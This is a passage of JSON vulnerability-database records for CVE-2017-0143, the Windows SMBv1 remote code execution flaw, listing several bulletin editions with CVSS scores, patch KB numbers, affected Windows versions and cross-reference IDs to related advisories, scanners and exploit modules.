"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB3177186", "KB3212646", "KB4012598", "KB4012606", "KB4012214", "KB4013429", "KB3210721", "KB4012215", "KB3213986", "KB4013198", "KB3205401", "KB3210720", "KB4012212", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T11:22:34", "differentElements": ["msAffectedSoftware"], "edition": 30}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T12:52:00", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB3177186", "KB3212646", "KB4012598", "KB4012606", "KB4012214", "KB4013429", "KB3210721", "KB4012215", "KB3213986", "KB4013198", "KB3205401", "KB3210720", "KB4012212", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T12:52:00", "differentElements": ["msAffectedSoftware"], "edition": 31}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T15:08:23", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KBMS16-110, 3187754", "KB3212646", "KB3210720", "KB4013198", "KB4012216", "KB3205401", "KB4012598", "KB3210721", "KB4013429", "KB4012217", "KB4012606", "KB4012212", "KB4012213", "KB3205409", "KB3213986", "KB3177186", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", 